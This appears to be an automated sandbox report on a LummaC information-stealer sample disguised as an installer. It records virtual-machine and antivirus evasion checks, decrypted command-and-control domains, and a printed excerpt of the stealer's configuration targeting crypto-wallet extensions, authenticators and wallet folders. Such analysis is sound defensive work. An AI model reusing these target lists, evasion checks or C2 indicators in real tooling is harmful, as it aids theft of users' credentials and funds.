Source: k7h8uufe6Y.exe, 00000000.00000003.2115321107.0000000003B98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.paypal.com/sdk/js
Source: k7h8uufe6Y.exe, 00000000.00000003.1985292539.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.125.66.15:443 -> 192.168.2.4:49749 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DCDC7C	0_3_00DCDC7C
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DCDC7C	0_3_00DCDC7C
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DCDC7C	0_3_00DCDC7C
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DCDC7C	0_3_00DCDC7C
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00D73FE9	0_3_00D73FE9
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00D73B57	0_3_00D73B57

Source: k7h8uufe6Y.exe

Binary or memory string: OriginalFilenamegsetup.exe vs k7h8uufe6Y.exe

Source: k7h8uufe6Y.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/2@12/4

Source: C:\Users\user\Desktop\k7h8uufe6Y.exe

File created: C:\Users\user\AppData\Local\Temp\VMB7R5ASJ9ZHN3G5.exe

Jump to behavior

Source: k7h8uufe6Y.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\k7h8uufe6Y.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: k7h8uufe6Y.exe, 00000000.00000003.1999480670.0000000003B95000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: k7h8uufe6Y.exe

ReversingLabs: Detection: 15%

Source: k7h8uufe6Y.exe	String found in binary or memory: gdirector.exe" /install
Source: k7h8uufe6Y.exe	String found in binary or memory: Please make sure you have permissions to install software on this workstation. gdirector.exe" /install"Gizmo\There was a problem during preparation of the setup utility.
Source: k7h8uufe6Y.exe	String found in binary or memory: FastIcon/Addressbook.icoI

Source: C:\Users\user\Desktop\k7h8uufe6Y.exe

File read: C:\Users\user\Desktop\k7h8uufe6Y.exe

Jump to behavior

Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: k7h8uufe6Y.exe

Static PE information: certificate valid

Source: k7h8uufe6Y.exe

Static file information: File size 8460624 > 1048576

Source: k7h8uufe6Y.exe

Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x801000

Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD2EC3 push ss; iretd	0_3_00DD2EEA
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD2EC3 push ss; iretd	0_3_00DD2EEA
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DC7F8E push eax; retf	0_3_00DC7FCD
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DC7F1E push eax; retf	0_3_00DC7FCD
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD2EC3 push ss; iretd	0_3_00DD2EEA
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD2EC3 push ss; iretd	0_3_00DD2EEA
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DC7F8E push eax; retf	0_3_00DC7FCD
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DC7F1E push eax; retf	0_3_00DC7FCD
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD2EC3 push ss; iretd	0_3_00DD2EEA
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD2EC3 push ss; iretd	0_3_00DD2EEA
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD2EC5 push ss; iretd	0_3_00DD2EEA
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD2EC5 push ss; iretd	0_3_00DD2EEA
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD2EC5 push ss; iretd	0_3_00DD2EEA
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD6F90 push ds; iretd	0_3_00DD704C
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD6F90 push ds; iretd	0_3_00DD704C
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD6F90 push ds; iretd	0_3_00DD704C
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD2EC3 push ss; iretd	0_3_00DD2EEA
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD2EC3 push ss; iretd	0_3_00DD2EEA
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD2EC5 push ss; iretd	0_3_00DD2EEA
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD2EC5 push ss; iretd	0_3_00DD2EEA
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD2EC5 push ss; iretd	0_3_00DD2EEA
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD6F90 push ds; iretd	0_3_00DD704C
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD6F90 push ds; iretd	0_3_00DD704C
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD6F90 push ds; iretd	0_3_00DD704C
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00D82C94 push eax; retf	0_3_00D82CB5
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD2EC3 push ss; iretd	0_3_00DD2EEA
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD2EC3 push ss; iretd	0_3_00DD2EEA
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD2EC5 push ss; iretd	0_3_00DD2EEA
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD2EC5 push ss; iretd	0_3_00DD2EEA
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD2EC5 push ss; iretd	0_3_00DD2EEA
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Code function: 0_3_00DD6F90 push ds; iretd	0_3_00DD704C

Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\k7h8uufe6Y.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\k7h8uufe6Y.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\k7h8uufe6Y.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Users\user\Desktop\k7h8uufe6Y.exe TID: 6884

Thread sleep time: -240000s >= -30000s

Jump to behavior

Source: C:\Users\user\Desktop\k7h8uufe6Y.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: Amcache.hve.0.dr	Binary or memory string: VMware
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.0.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.0.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.0.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.0.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.0.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: k7h8uufe6Y.exe, k7h8uufe6Y.exe, 00000000.00000003.2024541513.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.1985324803.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2079463517.0000000000D71000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2023523686.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2037827438.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000003.2053120999.0000000000D73000.00000004.00000020.00020000.00000000.sdmp, k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D5F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.0.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D1F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.0.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.0.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.0.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.0.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.0.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.0.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.0.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.0.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.0.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.0.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.0.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.0.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.0.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.0.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.0.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.0.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.0.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\k7h8uufe6Y.exe

Process information queried: ProcessInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: k7h8uufe6Y.exe, 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: finickypwk.lat
Source: k7h8uufe6Y.exe, 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: shoefeatthe.lat
Source: k7h8uufe6Y.exe, 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: savorraiykj.lat
Source: k7h8uufe6Y.exe, 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: kickykiduz.lat
Source: k7h8uufe6Y.exe, 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: miniatureyu.lat
Source: k7h8uufe6Y.exe, 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: leggelatez.lat
Source: k7h8uufe6Y.exe, 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: washyceehsu.lat
Source: k7h8uufe6Y.exe, 00000000.00000002.2118898607.00000000028B0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: bloodyswif.lat

Source: C:\Users\user\Desktop\k7h8uufe6Y.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\k7h8uufe6Y.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: k7h8uufe6Y.exe, 00000000.00000002.2118594731.0000000000D49000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ender\MsMpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.0.dr	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\k7h8uufe6Y.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: k7h8uufe6Y.exe PID: 6372, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: k7h8uufe6Y.exe	String found in binary or memory: Wallets/Electrum-LTC
Source: k7h8uufe6Y.exe	String found in binary or memory: Wallets/ElectronCash
Source: k7h8uufe6Y.exe	String found in binary or memory: Jaxx Liberty
Source: k7h8uufe6Y.exe	String found in binary or memory: window-state.json
Source: k7h8uufe6Y.exe, 00000000.00000003.2040413355.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: chhojmggmffilplmbdicgaihlkp","ez":"Hycon Lite Client"},{"en":"klnaejjgbibmhlephnhpmaofohgkpgkd","ez":"ZilPay"},{"en":"aeachknmefphepccionboohckonoeemg","ez":"Coin98"},{"en":"bhghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Armory
Source: k7h8uufe6Y.exe	String found in binary or memory: ExodusWeb3
Source: k7h8uufe6Y.exe	String found in binary or memory: Wallets/Ethereum
Source: k7h8uufe6Y.exe, 00000000.00000003.2040413355.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets,"p":"
Source: k7h8uufe6Y.exe, 00000000.00000003.2040413355.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: chhojmggmffilplmbdicgaihlkp","ez":"Hycon Lite Client"},{"en":"klnaejjgbibmhlephnhpmaofohgkpgkd","ez":"ZilPay"},{"en":"aeachknmefphepccionboohckonoeemg","ez":"Coin98"},{"en":"bhghoamapcdpbohphigoooaddinpkbai","ez":"Authenticator","ses":true},{"en":"dkdedlpgdmmkkfjabffeganieamfklkm","ez":"Cyano"},{"en":"nlgbhdfgdhgbiamfdfmbikcdghidoadd","ez":"Byone"},{"en":"infeboajgfhgbjpjbeppbkgnabfdkdaf","ez":"OneKey"},{"en":"cihmoadaighcejopammfbmddcmdekcje","ez":"Leaf"},{"en":"bhhhlbepdkbapadjdnnojkbgioiodbic","ez":"Solflare"},{"en":"mkpegjkblkkefacfnmkajcjmabijhclg","ez":"Magic Eden"},{"en":"aflkmfhebedbjioipglgcbcmnbpgliof","ez":"Backpack"},{"en":"gaedmjdfmmahhbjefcbgaolhhanlaolb","ez":"Authy"},{"en":"oeljdldpnmdbchonielidgobddfffla","ez":"EOS Authenticator","ses":true},{"en":"ilgcnhelpchnceeipipijaljkblbcob","ez":"GAuth Authenticator","ses":true},{"en":"imloifkgjagghnncjkhggdhalmcnfklk","ez":"Trezor Password Manager"},{"en":"bfnaelmomeimhlpmgjnjophhpkkoljpa","ez":"Phantom"},{"en":"ppbibelpcjmhbdihakflkdcoccbgbkpo","ez":"UniSat"},{"en":"cpojfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":[""],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":[""],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\atomic\\Local Storage\\leveldb","m":["*"],"z":"Wallets/Atomic","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Armory

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\k7h8uufe6Y.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
